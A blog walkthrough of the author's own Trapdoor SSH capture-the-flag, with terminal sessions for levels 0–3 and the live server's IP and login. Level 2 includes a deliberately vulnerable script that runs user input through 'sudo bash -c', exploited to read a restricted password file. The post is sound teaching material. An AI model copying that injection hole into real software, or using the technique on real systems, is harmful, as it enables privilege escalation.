BP
Back to blog
7 min read
Trapdoor CTF Walkthrough 
   *   )                (
 ` )  /((      )        )\ )         (
  ( )(_))(  ( /( `  )  (()/( (    (  )(
 (_(_()|()\ )(_))/(/(   ((_)))\   )\(()\
 |_   _|((_|(_)_((_)_\  _| |((_) ((_)((_)
   | | | '_/ _` | '_ \) _` / _ \/ _ \ '_|
   |_| |_| \__,_| .__/\__,_\___/\___/_|
                |_|
trapdoor0@localhost:~$

Description

Trapdoor CTF is a multi-level challenge I created that progressively increases in difficulty. Each level represents different themed security scenario, requiring participants to apply various cybersecurity concepts and techniques to capture the flag and advance to the next level.

The CTF is hosted on a dedicated server, accessible to participants through SSH. Participants will start at level 0 and progress through the levels by solving challenges and obtaining the flag (password) for the next level.

For a limited time you can try the trapdoor ctf for yourself

    ssh trapdoor0@172.233.130.165  
    Password: trapdoor0

Please be respectful of the server and have fun.

Level 0:

Description

This level serves as a basic introduction to the game. Any of the passwords found in this document are not up to date and are for example only.

Steps

Log in.

    ssh [email protected]  
    Password: trapdoor0

Look around.


trapdoor0@localhost:~$ ls -la
total 48
drwx------  3 trapdoor0 trapdoor0 4096 Oct  3 21:43 .
drwxr-xr-x 10 root      root      4096 Jun 12 01:37 ..
-rw-------  1 trapdoor0 trapdoor0  131 Oct  3 21:43 .bash_history
-rw-r--r--  1 trapdoor0 trapdoor0  220 Jan  7  2023 .bash_logout
-rw-r--r--  1 trapdoor0 trapdoor0 3771 Jan  7  2023 .bashrc
drwx------  2 trapdoor0 trapdoor0 4096 Oct  3 21:24 .cache
-rw-r--r--  1 trapdoor0 trapdoor0 1537 Jun 12 01:37 dossier.txt
-r--r--r--  1 trapdoor0 trapdoor0  223 Jun 12 01:37 .encoded_password.txt
-rwxr-xr-x  1 trapdoor0 trapdoor0  445 Jun 12 01:37 hints.sh
-rw-r--r--  1 root      root       350 Jun 12 01:37 instructions.txt
-r--------  1 trapdoor0 trapdoor0   53 Jun 12 01:37 passwords
-rw-r--r--  1 trapdoor0 trapdoor0  807 Jan  7  2023 .profile
trapdoor0@localhost:~$

Check out the hidden file .encoded_password.txt.


trapdoor0@localhost:~$ cat .encoded_password.txt
admin: SnliNlBNbStKZDkzYktJcgo=
tech_service: a1B6dDBWZUNzNVFVOGVaSwo=
admin_69: blgxS09HYTR0K3MxcHcrcQo=
trapdoor1: bitGcW0vNnQyWFRsNmZMRwo=
bank_wire_cay: QXlJM2ZZOVRJU2hWN3QxYwo=
xeno_server555: ZUVoU2JGTG4rNGx4ejZ5ego=
trapdoor0@localhost:~$

Decode the password for trapdoor1.

trapdoor0@localhost:~$ echo "bitGcW0vNnQyWFRsNmZMRwo=" | base64 -d
n+Fqm/6t2XTl6fLG

Level 1: The Bank

Description

This level contains several documents that pertain to banking as well as a binary executable called bank_server. When run it opens a local socket that can be connected to using netcat.

Steps:

Log in and look around

trapdoor1@localhost:~$ ls -la
total 5932
drwx------  3 trapdoor1 trapdoor1    4096 Oct  3 22:03 .
drwxr-xr-x 10 root      root         4096 Jun 12 01:37 ..
-rwxr-xr-x  1 trapdoor1 trapdoor1 6031856 Jun 12 01:37 bank_server
-rw-r--r--  1 root      root          515 Jun 12 01:37 bank_statement.csv
-rw-r--r--  1 trapdoor1 trapdoor1     220 Jan  7  2023 .bash_logout
-rw-r--r--  1 trapdoor1 trapdoor1    3771 Jan  7  2023 .bashrc
drwx------  2 trapdoor1 trapdoor1    4096 Oct  3 22:03 .cache
-rwx------  1 trapdoor1 trapdoor1      17 Jun 12 01:37 .password
-rw-r--r--  1 trapdoor1 trapdoor1     807 Jan  7  2023 .profile
-rw-r--r--  1 root      root           65 Jun 12 01:37 secret_message.txt
-rw-r--r--  1 root      root          671 Jun 12 01:37 wire_transfers.txt
trapdoor1@localhost:~$

Start the bank server.

trapdoor1@localhost:~$ ./bank_server
[*] Bank server is listening on 0.0.0.0:9971

Note the port the server is listening, then open an another shell as trapdoor1, and login to the bank server using netcat and the correct port.

trapdoor1@localhost:~$ nc localhost 9971
Welcome to Ethan Overflow's Bank Server
Enter your query (server_query <transfer_date> <transfer_amount>):

When you correctly query the bank server, it gives you back an encryption key We can use this key to decrypt the secret message flag using AES-256. The correct querry is found in wire_transfers.txt

trapdoor1@localhost:~$ nc localhost 9971
Welcome to Ethan Overflow's Bank Server
Enter your query (server_query <transfer_date> <transfer_amount>): server_query 2023-05-06 100000
Querying transfer details...
Transfer to Enigma Ltd. successful.
Additional information: Enigma Ltd. is a shell corporation owned by Ethan Overflow.
Funds were used to purchase specialized hacking equipment.
Transfer complete. Encryption Key: Sh7Y8aw5UMeLij7B
Enter your query (server_query <transfer_date> <transfer_amount>):

trapdoor1@localhost:~$ cat secret_message.txt
U2FsdGVkX1/auvWLDVmY2Bnuc2nVeYG0g62OAwbu1LdHxD8tvm1zNCUPr3fxbLSf
trapdoor1@localhost:~$ echo "U2FsdGVkX1/auvWLDVmY2Bnuc2nVeYG0g62OAwbu1LdHxD8tvm1zNCUPr3fxbLSf" | openssl enc -d -aes-256-cbc -a -salt -pass pass:Sh7Y8aw5UMeLij7B
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
iRABFB2Vg38p0ZR2

Level 2: The Prison

Description:

This level has a directory called ‘prison’ which contains a bunch of inmate directories. It also contains a directory called ‘warden’. Looking at the warden directory, there are multiple files that implicate prisoner 69 for tampering with the laundry machine. There is also a file called trapdoor3_password, however trapdoor2 does not have permission to read it.

trapdoor2@localhost:~/prison/warden$ ls
incident_report.txt  journal.txt  memo.txt  shift_schedule.txt  trapdoor3_password.txt

Investigating inmates69’s directory reveals that he has infiltrated the security system by hacking the laundry systems firmware, and he has hidden a copy of the firmware in the directory of another inmate. Lets search the rest of the inmates directories for clues using grep using the key word laundry.

trapdoor2@localhost:~$   grep -r "laundry"
prison/inmate69/notebook.txt:Day 3: Success! I found a vulnerability in the laundry machine software that allows arbitrary command execution. I can use it to escalate my privileges and access restricted areas.
prison/inmate333/laundry_machine.sh:echo 'Please enter your laundry settings: '
prison/inmate333/laundry_machine.sh:result=$(sudo -u laundry bash -c "$settings")
prison/warden/journal.txt:I have my suspicions that inmate 69 has been attempting to exploit the vulnerability in the laundry machine software. The incident report from last week confirms that the inmate has knowledge of the vulnerability. I need to ensure that proper security measures are in place to prevent any unauthorized access.
prison/warden/incident_report.txt:Incident: Inmate 69 caught tampering with the laundry machine.
prison/warden/incident_report.txt:Details: Inmate 69 was found attempting to access the laundry machine's software system. Further investigation revealed that the inmate had knowledge of a potential vulnerability in the software.
grep: prison/warden/trapdoor3_password.txt: Permission denied
prison/warden/memo.txt:A vulnerability has been discovered in the laundry machine software. An update is pending to address the issue. In the meantime, keep a close eye on inmate activities related to the laundry room.
trapdoor2@localhost:~$

Looks like the copy of the laundry software is in inmate333’s directory, lets go there and check it out.

trapdoor2@localhost:~$ cd prison/inmate333
trapdoor2@localhost:~/prison/inmate333$ ls
laundry_machine.sh
trapdoor2@localhost:~/prison/inmate333$ cat laundry_machine.sh
#!/bin/bash
echo 'Welcome to PrisonWorld Laundry-matic!'
echo 'Please enter your laundry settings: '
read -r settings
result=$(sudo -u laundry bash -c "$settings")
echo "Ding! $result"
trapdoor2@localhost:~/prison/inmate333$

It looks like the laundry machine can run commands using its own privilage level, lets see if we can use it for a privilage execution attack and print out the trapdoor3 password file in the warden’s directory.

trapdoor2@localhost:~/prison/inmate333$ ./laundry_machine.sh
Welcome to PrisonWorld Laundry-matic!
Please enter your laundry settings:
cat /home/trapdoor2/prison/warden/trapdoor3_password.txt
Ding! eL+mdvXWl/Tnv4Cd

Level 3: The Missile Silo

Description:

This level finds you in a top secret missile silo. The missle silo computer system contains some documents that have clues suggesting that you need to find the launch code. There is also a program called ‘trace’ that can parse wireshark pcap files as well as a couple of pcap files the players can use with the trace program.

In the it_memo.txt document there is a binary string at the bottom. Lets decode that string that see that it says

trapdoor3@localhost:~$ echo "01010000011000010110001101101011011001010111010000100000011000100110001001100110001000000100000101000011010010110010000001101110011101010110110101100010011001010111001000100000011010000110100101100100011001000110010101101110001000000110100101101110001000000110110001100001011100100110011101100101010011010110100101111000001011100111000001100011011000010111000000100000011010000110111101101100011001000111001100100000011101000110100001100101001000000110101101100101011110010010000001110100011011110010000001110011011101010110001101100011011001010111001101110011" | perl -lpe '$_=pack"B*",$_'
Packet bbf ACK number hidden in largeMix.pcap holds the key to success

This is the end of this guide as this level is still under construction.